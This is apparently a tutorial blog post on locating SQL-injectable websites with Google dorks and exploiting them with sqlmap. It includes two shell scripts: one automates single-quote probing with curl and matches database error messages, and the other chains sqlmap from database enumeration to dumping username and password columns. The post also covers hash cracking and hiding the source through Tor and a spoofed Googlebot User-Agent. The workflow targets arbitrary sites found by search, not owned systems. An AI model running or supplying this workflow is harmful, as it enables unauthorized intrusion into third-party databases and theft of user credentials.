SQL Injection – Sqlmap and Google Dork

Google Dorking (or Google Hacking) is the use of Google's advanced search operators to find websites that expose sensitive data or show the signs of a security hole. Many websites expose sensitive data to the Internet, and a fair number of them are vulnerable to SQL injection.

Sqlmap is an open source penetration testing tool that automates the detection and exploitation of SQL injection flaws. It is also used for plenty of blackhat reasons. The tool is powerful, so use it wisely: only against your own servers, or against other people's websites with their explicit permission.

There are many operators that can be used to search for vulnerable websites on Google. These are some examples:

  • intitle: the results are pages that have the word in their title
  • inurl: the results are pages that have the word in their URL
  • filetype: the results are files of the given type (for example filetype:sql or filetype:log)
  • intext: the results are pages that contain those words in their content
  • site: the results are limited to the given site only

Search for vulnerable websites

If you type “inurl:item_id=” into Google, you will get a lot of results: pages whose URL carries a parameter named item_id. Some of those parameters may be injectable, but a search hit is only a candidate; you have to test it before you try to exploit anything.

Test a URL for vulnerabilities

Now you have a URL with GET parameters in it. The simplest test for SQL injection is to append a single quote to a parameter value. For example, if the initial URL is http://www.distro-zone.com/articles/?item_id=5 and you append a single quote to the parameter, you get http://www.distro-zone.com/articles/?item_id=5' (the browser sends the quote URL-encoded as %27).

Open this new URL. If the page comes back with a database error (for example MySQL's “You have an error in your SQL syntax”), the quote reached the query unescaped and the parameter is very likely injectable. The reverse does not hold: a site that shows a generic or empty page instead of an error can still be vulnerable to blind injection, so the absence of an error is not proof that the parameter is safe.
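The manual single-quote test above, automated as an added shell example (not code from the original post): quote_probe_urls builds one probe URL per query-string parameter with a single quote appended to that parameter's value, and sqli_error_signature reports which DBMS a response body's error message points to. The target URL is the post's own example; the error strings are the well-known messages each engine emits for an unbalanced quote; curl is invoked only by probe_url, which you run yourself against a site you are permitted to test.

```shell
#!/bin/sh
# Added example, not from the original post: automates the single-quote test.
# Only probe_url touches the network; point it only at sites you may test.

# Print one probe URL per query-string parameter, with a single quote appended
# to that parameter's value (sent raw; curl passes it through unchanged).
# Returns 1 if the URL has no query string to probe.
quote_probe_urls() {
  url=$1
  case $url in *\?*) ;; *) return 1 ;; esac
  base=${url%%\?*}
  query=${url#*\?}
  old_ifs=$IFS
  IFS='&'
  set -- $query             # positional parameters: one "name=value" pair each
  IFS=$old_ifs
  i=0
  for _ in "$@"; do
    i=$((i + 1))
    j=0
    probe=""
    for pair in "$@"; do
      j=$((j + 1))
      [ "$j" -eq "$i" ] && pair="$pair'"
      probe="${probe:+$probe&}$pair"
    done
    printf '%s?%s\n' "$base" "$probe"
  done
}

# Read a response body on stdin; print the DBMS whose error message it contains
# and return 0, or print nothing and return 1. The patterns are the classic
# error strings each engine produces when a quote is left unbalanced.
sqli_error_signature() {
  body=$(cat)
  if   printf '%s' "$body" | grep -qiE 'You have an error in your SQL syntax|mysql_fetch_|mysqli?_(query|error)'; then
    echo MySQL
  elif printf '%s' "$body" | grep -qiE 'Unclosed quotation mark|Microsoft OLE DB Provider for SQL Server|SqlException'; then
    echo "Microsoft SQL Server"
  elif printf '%s' "$body" | grep -qiE 'unterminated quoted string|pg_query\(|PSQLException'; then
    echo PostgreSQL
  elif printf '%s' "$body" | grep -qE 'ORA-[0-9]{5}'; then
    echo Oracle
  elif printf '%s' "$body" | grep -qiE 'SQLITE_ERROR|sqlite3?\.OperationalError|unrecognized token'; then
    echo SQLite
  else
    return 1
  fi
}

# Fetch every probe for a URL and report matches. Needs network access.
# A probe that returns no error is NOT cleared: blind injection shows no
# error at all, which is what sqlmap's boolean- and time-based tests are for.
probe_url() {
  quote_probe_urls "$1" | while IFS= read -r probe; do
    if dbms=$(curl -sS --max-time 10 -A 'Mozilla/5.0' "$probe" | sqli_error_signature); then
      printf '%s\n    -> %s error message in response\n' "$probe" "$dbms"
    else
      printf '%s\n    -> no error (not proof of safety)\n' "$probe"
    fi
  done
}

# Usage (hypothetical file name): sh quote-probe.sh 'http://www.distro-zone.com/articles/?item_id=5'
if [ "$#" -gt 0 ]; then
  probe_url "$1"
fi
```

Probing one parameter at a time matters: appending the quote to the whole query string only tests the last parameter, and a multi-parameter page is often injectable in the one you did not look at.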

Use sqlmap on a vulnerable URL

Download sqlmap from sqlmap.org. It is written in Python, so you need a Python interpreter to run it. The tool can fingerprint the database engine, enumerate databases, tables and columns, dump tables entirely, and much more. If you have Kali Linux, sqlmap is already installed.

First of all, you need to find out which database management system (database engine) is in use and which databases it holds. Run sqlmap against the URL with the -u and --dbs options.

Here -u takes the target URL and --dbs asks sqlmap to enumerate the databases on the DBMS. If the injection works, sqlmap reports the detected engine (MySQL, PostgreSQL and so on) and lists the database names. Now run the command again, naming the database you want to look into.

Here -D selects the database and --tables lists all the tables in it. After this run you will see every table in that database. Choose a table, select it with -T, and list its columns with --columns.

The result is the list of columns in that table. If you see something interesting, like id, username and password, you can retrieve the records with --dump, restricted to the columns you name with -C.

Most probably the password column will be hashed. A hash is not “decrypted”; it has to be cracked, by hashing candidate passwords from a wordlist with a tool such as hashcat or John the Ripper and comparing the results. Unsalted fast hashes like MD5 or SHA-1 fall quickly to that, and sqlmap itself offers to run a dictionary attack when a dumped column looks like known hash formats.

This is a pretty basic use of sqlmap; the tool can do a lot more. Raising --level (1 to 5, default 1) makes it try more payloads and, from level 2 up, also test cookie and then header values; raising --risk (1 to 3, default 1) adds heavier payloads. Be careful with --risk=3: it enables OR-based tests which, if the injectable parameter ends up inside an UPDATE or DELETE statement, can modify every row in the table.

Moreover, you can route the traffic through the Tor network with --tor (Tor needs to be installed and running; --check-tor verifies the tunnel actually works) and change the User-Agent header, for example to Google's crawler with --user-agent="Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)", or to a random browser with --random-agent. That hides your source IP from the target and stops the requests from announcing themselves (sqlmap's default User-Agent names the tool), but it does not make you untraceable: the requests, their timing and the payloads themselves all stay in the target's logs, and they are recognisably sqlmap's.
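The enumeration chain of the previous steps (databases, tables, columns, dump), together with the deeper --level/--risk run and the Tor-routed variant just described, as an added shell example that is not code from the original post. Each stage is a function that goes through run(), so with DRY_RUN=1 the exact sqlmap command is printed instead of executed and can be reviewed before anything is sent. The target URL is the post's own example; the database, table and column names and the script file name are placeholders.

```shell
#!/bin/sh
# Added example, not from the original post: the enumeration chain described
# above, one function per stage, plus the deeper and Tor-routed variants.
# Every function goes through run(), so DRY_RUN=1 prints the exact command
# instead of executing it; use that to review what will be sent first.
# Database, table and column names used below are placeholders.

run() {
  if [ "${DRY_RUN:-0}" = "1" ]; then
    printf '%s\n' "$*"
  else
    "$@"
  fi
}

# --batch answers sqlmap's interactive prompts with their defaults, so a stage
# runs unattended; drop it when you want to answer the questions yourself.

# Stage 1: confirm the injection, fingerprint the DBMS (-b prints its banner)
# and list the databases the injected query can see.
enum_dbs() {               # $1 = target URL with the suspect GET parameter
  run sqlmap -u "$1" --batch -b --dbs
}

# Stage 2: tables inside one database.
enum_tables() {            # $1 = URL, $2 = database name
  run sqlmap -u "$1" --batch -D "$2" --tables
}

# Stage 3: columns of one table.
enum_columns() {           # $1 = URL, $2 = database, $3 = table
  run sqlmap -u "$1" --batch -D "$2" -T "$3" --columns
}

# Stage 4: dump the rows. With -C only the named columns are fetched, which
# keeps the dump (and the data you now hold) to what the test needs.
dump_columns() {           # $1 = URL, $2 = database, $3 = table, $4 = "col1,col2"
  run sqlmap -u "$1" --batch -D "$2" -T "$3" -C "$4" --dump
}

# Deeper detection. --level (1-5) adds payloads and, from 2 up, tests cookies
# and then headers too; --risk (1-3) adds heavier payloads. Risk 3 enables
# OR-based tests that can rewrite every row if the parameter lands in an
# UPDATE or DELETE statement, so keep it to targets where that is acceptable.
deep_detect() {            # $1 = URL
  run sqlmap -u "$1" --batch --level=5 --risk=3 --dbs
}

# Same first stage through Tor. --check-tor aborts if the Tor proxy is not
# actually reachable; --random-agent replaces sqlmap's default User-Agent
# (which names the tool) with a browser one. This hides your source address,
# not the attack: the payloads are still in the target's logs.
enum_dbs_via_tor() {       # $1 = URL
  run sqlmap -u "$1" --batch --tor --check-tor --random-agent --dbs
}

# Usage (hypothetical file name; the dry run prints the commands without sending anything):
#   DRY_RUN=1 sh sqlmap-chain.sh 'http://www.distro-zone.com/articles/?item_id=5' app_db users 'username,password'
if [ "$#" -ge 1 ]; then
  enum_dbs "$1"
  if [ "$#" -ge 2 ]; then enum_tables "$1" "$2"; fi
  if [ "$#" -ge 3 ]; then enum_columns "$1" "$2" "$3"; fi
  if [ "$#" -ge 4 ]; then dump_columns "$1" "$2" "$3" "$4"; fi
fi
```

Run the stages in order and feed each one's output into the next by hand: sqlmap keeps a session file per target, so later stages reuse the injection point it already confirmed instead of re-detecting it.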

Last but not least, do not try this with bad intentions. sqlmap's own disclaimer says:

Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user’s responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program.
